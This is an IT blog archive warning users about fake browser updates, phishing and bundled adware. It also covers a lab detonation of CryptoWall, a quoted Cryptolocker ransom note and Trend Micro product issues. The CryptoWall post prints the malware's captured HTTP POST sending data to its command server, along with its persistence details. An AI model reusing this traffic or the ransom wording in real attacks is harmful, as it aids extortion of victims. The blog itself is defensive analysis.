Archive for category IT

Oh no, I have been told to upgrade my Internet explorer (But I am running the latest)

So here I am surfing the internet and suddenly I am redirected to a site where I had not intended to go. It tells me I need to upgrade my browser. Very tempting as it tells me I will get better streaming HD video.

Being an IT guy, I know I already have the latest version. I also note that the URL is not a Microsoft URL. The Terms have some odd bits in it.

For all the non IT people out there …… Use Windows Updates. If you want to update your browser, find it on Microsoft’s website and install it yourself. Don’t follow prompts like this (no matter how convincing it looks).  hijack

So, this looks like Microsoft .. Right ?

It says
You are currently browsing the web with Internet Explorer and your Video Player might be outdated Please update to the latest version for better performance •Superior HD Video Streaming and Hardware Acceleration •Download Any Movies, Shows or Video Clips •Critical Security Patch and Bug Fixes •Richer, more immersive user experiences Note:This Update is Free and Takes Under a Minute on Broadband No Restart Required

 

Looks ok. I have never seen a browser update take less than a minute on most broadband. Since when does Microsoft support you downloading movies ? Hmm, looks suspicious.

The URL also looks odd.

http://www.lpmxp2043.com/305133314B7C27473573724271246E3313D5259198A40DE0ED3FE3160363CC97B4FBCE214DE4FF2FF58D81C3BF6B3A99?dv4=mariRM-AU&marketing_fid=MTQwNjEwOTQ2OS0yODUxNWNjYTlkOWQzMzMxZDEwNGJlNzdjZTA5ZTNkOA%3d%3d&tgu_src_lp_domain=www.dnwlistsoft.com&r=1127043608&dv3=&dv2=&sec_id=qWJ8vBQjIEzEzreaqZipDn7pCZO6Y3RmIaRmqldRPAMr7TCuC3i8fAvaNBuEhnoQzA847kM47AN%ef%bf%bd&affid=12712

What’s up with this section in the terms ?
2. Delivery of Advertising. By accessing the Sites and downloading the Content, you hereby grant us permission to display promotional information, advertisements, and offers for third party products or services (collectively “Advertising”). The Advertising may include, without limitation, content, offers for products or services, data, links, articles, graphic or video messages, text, software, music, sound, graphics or other materials or services. The timing, frequency, placement and extent of the Advertising changes are determined in our sole discretion. You further grant us permission to collect and use certain aggregate information in accord with our Privacy Policy.  

But no one reads the terms do they ? I noticed that nowhere does it mention Microsoft. It just talks about your browser.

The last line of the terms is also odd. The only place where you might  make contact with the software maker, has no hyperlinks or contact details.
If you would like to contact us via e-mail, please send a message here

 

So avoid this and don’t be tricked.

Here are the full terms
LEGAL INFORMATION ATTENTION! PLEASE READ THIS AGREEMENT CAREFULLY BEFORE ACCESSING THE SITE AND DOWNLOADING ANY CONTENT. IF YOU USE THE SITE OR DOWNLOAD CONTENT YOU AGREE TO EACH OF THE FOLLOWING TERMS AND CONDITIONS. This is a legally binding contract between you and the installer. By downloading, installing, copying, running, or using any content of dnwlist.com, you are agreeing to be bound by the terms of this Agreement. You are also agreeing to our Privacy Policy. If you do not agree to our terms, you must navigate away from our Sites, you may not download the Content, and you must destroy any copies of the Content in your possession. If you are under 18, you must have your parent or guardian’s permission before you use our Sites or download Content. In an effort to comply with the Children’s Online Privacy Protection Act, we will not knowingly collect personally identifiable information from children under the age of 13. This Agreement may be modified by us from time to time. If you breach any term in this Agreement your right to use the Sites and Content will terminate automatically. 1. The Download Process. Your download and software installation is managed by the Installer. The installer(i) downloads the files necessary to install your software; and (ii) scans your computer for specific files and registry settings to ensure software compatibility with your operating system and other software installed on your computer. Once the installer has been initiated, you will be presented with a welcome screen, it allows you to choose to install the software or cancel out of the process. We may show you one or more partner software offers. You are not required to accept a software offer to receive your download. We may also offer to: (i) change your browser’s homepage; (ii) change your default search provider; and (iii) install icons to your computer desktop. Software we own and our partner’s software may include advertisements within the application. 2. Delivery of Advertising. By accessing the Sites and downloading the Content, you hereby grant us permission to display promotional information, advertisements, and offers for third party products or services (collectively “Advertising”). The Advertising may include, without limitation, content, offers for products or services, data, links, articles, graphic or video messages, text, software, music, sound, graphics or other materials or services. The timing, frequency, placement and extent of the Advertising changes are determined in our sole discretion. You further grant us permission to collect and use certain aggregate information in accord with our Privacy Policy. 3. Your Obligations. You may not use another person’s name or information on our Sites. You agree to use the Sites and Content only for lawful purposes. You agree not to take any action that might compromise the security of the Sites, render the Sites inaccessible to others or otherwise cause damage to the Sites or the Content. You agree not to use the Sites in any manner that might interfere with our or our Partner’s rights. You represent and warrants that (a) you are the owner or an authorized user of the computer that the Content is installed on, (b) you will use the Content, and the Sites only for lawful purposes, and will comply at all times with all applicable federal, state, and local laws and regulations, and (c) you are at least thirteen years of age. Persons under thirteen years of age may not use the Content. You agree not to use any automated or manual process to interfere with, modify, or attempt to interfere with or modify the Content, except to uninstall the same as provided herein. You acknowledge sole responsibility for installing appropriate anti-virus software and other security measures on your computer. You may not use, or export the Content in violation of applicable Spain laws or regulations. 4. Grant of License. We grant you a non-exclusive, non-transferable and non-assignable license to use the Content. You may not rent, lease, sell, redistribute, sublicense or otherwise transfer the Content. You may make only such copies of the Content as are reasonably necessary for your own use, and any copy made by you must bear the same copyright and other proprietary notices that appear on the copy furnished by us. 5. Termination. This license will immediately terminate if you violate any provision of this Agreement. We may also terminate this license at any time without notice. 6. Ownership. We own all intellectual property rights in and to the Content. This license is not a sale and does not render you the owner of a copy of the Content. Ownership of the Content and all components and copies thereof will at all times remain with us, regardless of who may be deemed the owner of the tangible media on which the Content is copied, encoded or otherwise fixed. 7. Disclaimer of Warranties. WE PROVIDE ALL CONTENT “AS IS,” “WITH ALL FAULTS,” AND WITHOUT ANY WARRANTY WHATSOEVER. ALL SITES ARE PROVIDED ON AN “AS IS, AS AVAILABLE” BASIS. WE DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING ANY IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR ANY PARTICULAR PURPOSE, TITLE OR NON-INFRINGEMENT. WE DO NOT WARRANT ANY PART OF THE CONTENT NOR DO WE REPRESENT THE CONTENT WILL MEET YOUR NEEDS OR THAT ITS OPERATION WILL BE UNINTERRUPTED OR ERROR FREE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE CONTENT IS WITH YOU. 8. Exclusive Remedy. IF YOU ARE DISSATISFIED WITH THE SITES, THE CONTENT OR THESE TERMS AND CONDITIONS, YOUR SOLE AND EXCLUSIVE REMEDY IS TO DISCONTINUE USING THE SITES AND CONTENT. 9. Limitations of Liability. WE ARE NOT LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INCIDENTAL, CONSEQUENTIAL, SPECIAL, INDIRECT, PUNITIVE OR EXEMPLARY DAMAGES, INCLUDING, WITHOUT LIMITATION, EQUIPMENT DOWNTIME, LOSS OF DATA, OR LOST PROFITS, EVEN IF WE HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. BY INSTALLING OR USING THE CONTENT, YOU ACCEPT SOLE RESPONSIBILITY FOR ALL CONSEQUENCES ARISING THEREFROM AND ACKNOWLEDGES THAT NO CLAIM WHATSOEVER WILL BE MADE AGAINST US OR OUR LICENSORS, DISTRIBUTORS, AGENTS, EMPLOYEES OR AFFILIATES. 10. Third-Party Advertisers. We make no representations or warranties concerning third-party or Partner Offers, you agree that we are not responsible or liable for any loss or damage of any sort incurred, or as the result of the delivery or display of the Offers. WE ARE NOT RESPONSIBLE FOR THE TERMS AND CONDITIONS OF ANYTHIRD-PARTY OR PARTNER WEBSITE OR OFFERS REGARDLESS OF WHETHER THE OFFER IS HOSTED BY US. WE MAKE AN EFFORT TO SCREEN ALL OFFERS TO ENSURE THE BEST POSSIBLE EXPERIENCE FOR OUR USERS. HOWEVER, WE ARE NOT RESPONSIBLE FOR DEALINGS BETWEEN YOU AND A PARTNER. YOU ARE HOWEVER RESPONSIBLE FOR AND MUST CAREFULLY REVIEW EACH PARTNER OFFER AND READ THEIR TERMS AND CONDITION, AND THE PRIVACY POLICY. 11. Copyright Policy. To be effective, notifications must include the following information: (i) a physical or electronic signature of a person authorized to act on behalf of the owner of the copyright that has been allegedly infringed; (ii) identification of works or materials being infringed; (iii) identification of the content that is claim to be infringing including, information regarding that location of the content that the copyright owner seeks to have removed, with sufficient detail so that the installer is capable of finding and verifying its existence; (iv) contact information about the notifying party including address, telephone number and email address; (v) a statement that the notifying party has a good faith belief that the content is not authorized by the copyright owner, its agent, or the law; and (vi) a statement made under penalty of perjury that the information provided is accurate and the notifying party is authorized to make the complaint on behalf of the copyright owner. Once a complete and proper notice of claimed copyright infringement is received by the installer , it is the installer’s policy to: (i) remove or disable access to the content on the installer’s websites or content directories; and (ii) block a user who has posted infringing content two or more times from posting any further content. 12. Definition of Terms. Offers include promotions, advertisements contests and third-party software presented by our Partners and us. Personally Identifiable Information (PII) is any information that identifies or could be used to identify, contact or locate you. It also includes your credit card number. Partner is an advertiser, or other entity with whom we have a business relationship to provide Offers. Content includes, but is not limited to, our software. User means an individual that has accessed the Sites on which we host our Products or Services. We, Us and Our refers to the installer and its subsidiaries. You and Your refer to each user and his or her agents. 13. Questions or Additional Information. If you have any questions regarding this Agreement or wish to obtain additional information, you can contact us by writing to: If you would like to contact us via e-mail, please send a message to here 14. Laws and Jurisdiction. The present legal notice is subject to Spanish law. The user accepts that the applicable law for the website shall be Spanish law. Any type of proceeding, complaint or conflict derived from the usage or activity of this website shall be solved within the jurisdiction of the Courts of Spain. the installer, reserves the right to make the necessary changes to the present terms and conditions, which will be available in the website. 15. TREATMENT OF PERSONAL INFORMATION. On the other hand, the authors understand that this Web site offers added value services and that in some occasions, a share can be charged for said services to the end user for maintenance of the Web site or said services, but never related to the acquisition of the license of a product. The author also accepts that the above-mentioned electronic means can require the change of the main page or the creation of the direct access (shortcuts) top ages related to this Web site(but never to pages property of the author). The relationship between the author and the Web site can be terminated at anytime prior request of any party. Any manufacturer can request the update or the removal of any software applications offered in this Website. TREATMENT OF PERSONAL INFORMATION In compliance with Act15/1999, 13 December, of Protection of Personal Information and development regulation (hereinafter, the Company), holding company of this Web Site,(hereinafter, the Portal) informs you that the information obtained through the Portal will be handled by the Company, as the party in charge of the File, with the goal of facilitating the requested services, attending to queries, carrying out statistical studies that will allow an improvement in service, carrying out typical administrative tasks, sending information that may result of your interest through bulletins and similar publications, as well as developing sales promotion and publicity activities related to the Portal. The user expressly authorizes the use of their electronic mail address and other means of electronic communication (e.g., mobile telephone) so that the Company may use said means of communication and for the development of informed purposes. We inform you that the information obtained through the Portal will be housed on the servers of the company OVH, SAS, located in Roubaix (France). Upon providing your information, you declare to be familiar with the contents here in and expressly authorize the use of the data for the informed purposes .The user may revoke this consent at any time, without retroactive effects. The Company commits to complying with its obligation as regards secrecy of personal information and its duty to treat the information confidentially ,and to take the necessary technical, organizational and security measures to avoid the altering, loss, and unauthorized handling or access of the information, in accordance with the rules established in the Protection of Personal Information Act and the applicable law. The Company only obtains and retains the following information about visit our site: The domain name of the of the provider (ISP) and/or the IP address that gives them access to the network. The date and time of access to our website. The internet address from which the link that that leads to our web site originated. The type of browser client. The client’s operating system. This information is anonymous, not being able to be associated with a specific , identified user. The Portal uses cookies, small information files generated on the user’s computer, with the aim of obtaining the following information: The date and time of the most recent visit to our web page. Security control elements to restricted areas. The user has the option of blocking cookies by means of selecting the corresponding option on their web browser. The Company assumes no responsibility through if the deactivation of cookies supposes a loss of quality in service of the Portal. If you would like to contact us via e-mail, please send a message here

 

Tags: , ,

Think before you click

Are you worried someone is going to steal your passwords? your details? your money? your privacy? your confidential company secrets? Your employers business? Your livelihood?


You have good reason to worry. Malicious people out there are trying to steal these very things and more. Both indirectly and directly. Everyone is a target. They don’t care who you are, they want your assets or want to leverage you to get to someone else’s assets.

They want to trick you, rip you off and make your life a misery. After all, they can make good money wrecking your life.


We as IT people help you to select antivirus, firewalls and implement security.


Unfortunately you are still the weakest link in the security chain.


So, what rules can help keep you safe?


Think before you click. Stop the click. Avoid the click. Just think a few more seconds before you push that mouse button. 



 stop the click


When you are on the internet, in your email, receive a USB drive from an unknown source or a friend’s external hard disk full of movies, don’t click on suspicious things!


Just in case the little voice in your head has not learnt how to warn you about suspicious things, here are our rules. 


It’s Free! If something proclaims it is free, it is likely not. Stop and think, how are they making money? How are they staying in business? How do they get funding? Can you trust their software? Can you trust their ethics?

Emails claiming you have gained access to something for free, web popups offering items for free or free software, can often lead you into a painful mess. If you have not paid for it, then I hope you researched it thoroughly before you jumped into it.


It is often said that if the product is free, you are the product. Turns out that you’re also the lab rat.


If you can’t afford something, don’t go looking for free solutions on the internet. Often you will end up being caught out. Be very careful.


You Won! If you won something, did you enter to win? Did you really enter that lottery? are you really the millionth visitor to a website? Can you really make money entering this scheme?

If you click now, do you really get an iPad? If you download this new toolbar, will it make your life better?
Chances are no. You did not enter these things nor have you won anything. Dismiss that email, that internet popup or popup from your program. It is after you.
Panic and click now! That email you received about illegal activity occurring on your bank account, accidental bank fee overcharge, your suspended account, an unexpected Tax return, urgent court appearance, invoice you have overdue, post item you have been waiting for you, shipping notice for a surprise parcel … all have urgency. All want you to click.
Don’t believe it. Don’t follow any link in the email. Don’t open the attachments. Don’t run anything, don’t give it your passwords.
No matter how realistic and correct the logos are, how accurate their data is, treat it with scepticism. The senders spend ages trying to make their messages seem authentic.
Think to yourself, do I actually have an account with these guys? Have I opted for email invoices from them? Do I have a parcel on the way?
If you answer yes, then manually go to a browser, type in their web address as you know it (not from the email), change your passwords online, download your invoice and complete your business under your terms.
Often when you hover over the links in the email or on a webpage, it is taking you to somewhere else other than where it is meant to.
Always manually go to a website to logon or change details, never follow an email link.
Missed messages You have an email about a missed Facebook, Google, Phone, Mobile or Fax message. Attached is the message. Don’t open it. Sign into these services and check your messages. Don’t use links in the email or look at the attachments. Think, do you actually use these services ? Can your mobile send you an email if you miss a message?


Awesome Job offer You have an email about a job opportunity. You happen to be looking for a job so you click the email right? Wrong. At best this is a random email sent to you coincidently and you will get a job that is not legal, is looking to exploit you or maybe you will not get paid. At worst this thing is going to hack you. Unless you have signed up for job alerts and get emails as expected, don’t open these things.


Safe in Web mail You have a suspect email but it is in your web email so you are safe to open the attachment as it will not affect your pc. Wrong. It will get you and your PC. 


Save money on downloads Your son/daughter has found a way to download music and movies for free. They can also get you free software like the latest Microsoft Office. You get it from them as you trust them. Whoops.

You have stepped into a trust network which contains people whom likely know little about how vulnerable they are. Most of these things are pirated. Many of the tools and websites that support these downloads will hack you and give you additional things inside your download that you don’t expect.


Image files, video files and even PDF files can contain viruses. Remember, free is not always free. We make a lot of money cleaning up peoples computers after they have downloaded a free “something”. 


Your Protected You have antivirus and a firewall. You are safe! No, you are not really. There are thousands of new viruses and Malware detected per hour. If your systems are only a few hours behind, then there are thousands of nasties you can’t be protected from. If you choose to download something and force it to download, many times you can override your protections or work beyond the system, making you vulnerable. At best, you are safer and have good odds.


Popups You will often get website popups offering you special prices or free things. When you click them, you will likely get more popups and you may end up downloading all kinds of things. If you get a popup and push the cancel button to make it go away, you think you are safe? No you are not! The website programmers control everything on the popup. They control the install button and the cancel button. Why can’t they make the install button, install the software as normal and make the cancel button, install something else without telling you? Of course they can. your best option is to click the cross in the top right hand corner and close the popup completely.


Toolbars You have these cool toolbars in Internet explorer that make your life easier. Sure, except many of them track your movements, download other tools and slow your browser down. Remove the toolbars and don’t accept them.


Unexpected presents You downloaded a program and afterwards, you have toolbars, new icons on the desktop and your machine runs slow. Nothing like you expected. Often many “free” tools include other “free” tools. Many of these are Malware. Read carefully the terms of the product you are installing. If the terms for your product “xxx” refer to a different product “yyy” then chances are there is something else bundled into the installation. I have seen many products where you need to carefully read the terms and click decline or cancel many times to get past the “bundled” software to get to the final product you really want. Often you need to unselect tick boxes during the install to get a clean install.


Often during the install you will spot a name or logo of one of the programs “Partner products”. It might ask “do you want to install?”, you say No. Then another product comes up and it says “Would you like to skip this offer” and as you previously said no, you don’t fully read what is on the screen and instinctively press No and guess what, it installs it. You selected no, you don’t want to skip the product. It did as it was told. Be careful on the play with words that can occur during these installs.


Updates Updating tools like Java or Adobe (As examples) can now offer you extra toolbars like ASK toolbar and the like. You need to be careful as accepting these things not only slows your machine down, it bolts sometimes badly written toolbar code into Internet explorer (So it causes crashes) and can change your default search page and home web page.


Solving your own IT problems Many people get tricked into downloading driver update tools, pc fix up tools or registry repair tools. They usually don’t help. These can be dangerous, bog your machine down and download other items.


Known types of attachments are safe Many email attachments look like a harmless PDF files but are not. It is easy to change the icon you see and choose one that you associate as safe. A malicious item can have a “safe” icon. This is further complicated as there are exploits that allow real PDF and Jpeg files to carry viruses and Malware. Simply be sceptical of any files you download or receive as attachments.

There are many other tricks we use to avoid these nasties. This short list will get you thinking. Using this list you can avoid some of the bigger nasties like Cryptolocker and Cryptowall

Think before you click !  

 

Tags: , , ,

Infecting myself with Ransomware (Exploring CryptoWall)

What, am I crazy ?

No, I have a lab setup with a DMZ and loads of protection. I just need to download and run Cryptowall as my final step. My setup includes some sample data to encrypt,  wireshark for packet sniffing and Sysinternals Process Monitor.

So, let the fun begin. Thanks to the antivirus companies out there (Trend Micro etc) this is harder than I thought. I also had to dumb down my Sonicwall firewall to let viruses through. The antivirus companies have been taking down the virus URL’s faster than I can check them. It took ages to locate and download the Document-128_712.zip file. Awesome to see the AV companies are on top of their game.

So I had to bypass the built in Internet Explorer protection (It also wanted to kill my download) and finally I have Document-128_712.zip. I extracted out the contents. Document-128_712.scr with a PDF icon. I double click the screensaver file (Executable in disguise) and the file vanished. The mouse moves to an hourglass for a second and then nothing. I refer to the wireshark and process monitor. They are blitzing past recording data.

There is nothing at the desktop to indicate what is happening (except the hard disk light flashing). If I had been caught by this, I might be tempted to double click it again and again as nothing appears to happen.

As this thing encrypts alphabetically, I wait until I start seeing the signs of the encryption appearing in the hard drive sub folders and then I created a folder called “a” as in C:\a. It is safe as the process does not seem to double back once it has passed a letter of he alphabet. A nice place to save logs etc. So, here come the screenshots. Some from this current experiment, some from an actual infection.

PDF file

So here is the Scr file, renamed into bd99547.exe. Is is the same file as Document-128_712.scr as the hashes are the same. It is in the startup group so it you restart your pc, it continues to encrypt.

startup

 

Now showing all hidden files on the C:\ drive, I find a hidden folder with the same exe file in it.

hidden folder on c

 

So I let this thing continue on and do it’s job. The file exe file located in the startup startmenu category and on C:\ will vanish later. I watch as Process Monitor shows me the “exe”  file I ran, using Windows built in cryptography to encrypt everything. I note that the malware does not need to download anything from the internet. Microsoft have already provided everything it needs. It is using Microsofts own tools to hold us ransom.

I watch it connect to 199.127.225.232 and do a HTTP post. This server is called babyslutsnil.com

POST /da2c5yzx438 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
Content-Length: 100
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E)
Host: babyslutsnil.com
Cache-Control: no-cache

 z=109a242f761c53dbf5fa7883a817baff7b6f70eec0b2c20b9c59a99d5e6ddcb49ed56d8d6082a4df4909c8600c5850ad16HTTP/1.1 500 Internal Privoxy Error
Date: Sun, 29 Jun 2014 23:41:14 GMT
Content-Length: 778
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Last-Modified: Sun, 29 Jun 2014 23:41:14 GMT
Expires: Sat, 17 Jun 2000 12:00:00 GMT
Pragma: no-cache
Connection: close

 

html
head
title 500 Internal Privoxy Error /title
link rel=”shortcut icon” href=”http://config.privoxy.org/error-favicon.ico” type=”image/x-icon”> /head
body
h1 500 Internal Privoxy Error /h1
pPrivoxy encountered an error while processing your request:/p
pbCould not load template file codeforwarding-failed/code or one of its included components./b/p
p Please contact your proxy administrator./p
p If you are the proxy administrator, please put the required file(s)in the  code i (confdir) /i /templates /code  directory.  The location of the  code i (confdir) /i /code directory is specified in the main Privoxy code>config/code file.  (It’s typically the Privoxy install directory, or code/etc/privoxy//code)./p
/body
/html

I can only assume it is trying to send out the RSA encryption key to the remote server.

Then you start seeing the encrypted files in folders with additional files (DECRYPT_INSTRUCTION).

decryot files

Then you find a key in the registry which starts off the same as the exe file name

registry

 

and then the exe’s start to vanish and are replaced with the warnings you will see next reboot.

 

startup1

 

Then you get invited to go up, pay some money, download another exe file (Do you trust it?) with the decryption and away you go !

pay

It uses the TOR network for the website so there is no way to track these guys. They are annonymous and invisable.

Now the trick is to get these files and screen shots from “C:\a” onto my USB key, as when I plug it in, the files get encrypted.

Final step, FORMAT THE MACHINE. My packet Sniffs and Process monitoring has shown me that this Malware gets all over your PC.

Don’t fix it, reformat it. You can recover files from Backups or Volume Shadow copy but the underlying OS is now owned by some remote hacker. Don’t dice with death!

Moral: Have offline current backups !


 

 

Tags: , , ,

Upgrade to Trend Micro Worry Free 9 causes 10 minute stall when plugging in USB storage

On one of our installations, since installing TMWF9, whenever a USB drive (Hard disk or Flash media) is installed to the Master server, explorer stops responding for 10 minutes.

Remote access for file shares on servers still works. Sharepoint, Exchange and other services are unaffected. It is just the Explorer Windows on the local server console (Which is used for the Browse feature or File explorer /My Computer).

If you open the Disk Management before inserting the drive, you note that a volume comes up, then it all stalls and the disk is not allocated a drive letter for 10 minutes.

From a command prompt, if you try and move to that disk, it stalls. If you try a non existant disk, it comes back “drive not found”. In this way I know I can navigate using CMD and switch between drive letters to valid letters, just not this new volume.  It seems the drive has started allocating resouces but it is not yet available for use.

If during this time you try and stop the Trend Agent – real-time scan service, it hangs whilst stopping until the 10 minutes is up.

If we halt that service first, USB drives go in and out as normal. If we do not halt it or it restarts, when inserting a drive, Explorer hangs again for 10 minutes.

After 10 minutes, the drive volume appears, Explorer responds and everything goes back to normal.

There are no events recorded in the EventLog :(

Tags: , , ,

Cryptolocker (Again, new and improved ?)

UPDATE: Be sure to read the comments to this post. I am posting new information and updates as comments. There is a lot of information there.

 

Yes, again we see Cryptolocker. My client emailed me the following “I received an email on Friday from Energy Australia that took me to a website and it asked me to run a program but I could not open anything I believe that email may have caused this issue if that is of any help”

This falls in line with other peoples observations i.e. http://blogs.appriver.com/Blog/bid/102814/New-CryptoLocker-Has-a-Walkabout

 

We have not yet worked out how this version works nor what files have been affected. Here is the text
  !!! YOUR SYSTEM IS HACKED !!! All your files was encrypted with Cryptolocker!   This means that without the decryption key the recovery of your files is not possible, If your files have a value to you and you are willing to pay me for the decryption key please contact me: decrypt-request@mail.ua   You have 3 days to pay for my services. After this period, you will lose all your files.   Anti-virus software can remove Cryptolocker, but can not decrypt your fles. The only way to recover your files -is to pay for the decryption key.   Information for IT-specialist:   Data was encrypted with AES (Rijndael) algorithm with the session key length if 256 bits. Session key is encrypted with RSA (2048 bits) algorithm. Public-key is enclosed into Cryptolocker. Private-key for decryption of the session key is stored only in my database. To crack this key, you will need more than a million years time.

Here is a photo
Img_0804ed2

This is the nasty email that began it all

email

 

 

 

 

Tags: ,

Real world test of Trend Worry Free Professional

I miss Microsoft ISA/TMG. I miss being able to report staff’s internet usage, solve bottlenecks, isolate PC’s that have downloaded Malware and all the other general IT admin things that go with this.
Along comes Trend Worry Free Professional which allows you to setup your browser to the external proxy in Trend Micro’s Amazon cloud.

You can setup Ldap integration with your AD and then after the staff have used it, do reports on their activity.

This all sounds really nice.

So what are the real world issues with this product?
  • Using it from South Australia and using Proxy servers on the eastern side of Australia, my latency is huge. It adds 30 ms. A slow ADSL2+ connection feels this badly. All my pages are delayed and slow coming up. The experience over fibre or in the eastern states is far less exaggerated.
  •  I keep getting certificate popups. I get it for my email (Especially using Office 365), I get it for many of the HTTPS sites I use.
  • The proxy settings are easy to tamper with. Unless you lock IE settings down or force the settings via Group policy, users can bypass the proxy.
  • I have a few websites that “sometimes work”. One happens to be my webmail. The experience is very hit and miss with the proxy turned on.
  • The built in reports are very basic. They don’t give me enough detail.

Ok, this all sounds really bad. Yes, there are some teething issues and the latency is killing me so why do I love this product ?
  • It filters all my outbound web traffic and removes Malware and viruses instantly as discovered.
  • I can dump the raw logs into Excel an do my own reports.
  • I can have external roaming users logged into this no matter where they are in the world.
  • I have control of what happens on the network.

So if you have Fibre, are in the eastern states or have a client with very little expectations (maybe they are not a big internet user) then this is an awesome tool.

If you are a geek like me, you have to work out if the tool makes your habits safer and live with it, or forge ahead as the speed annoyed you and run other protection.

Don’t forget, this is only version 1, future advancements will help.

Tags: ,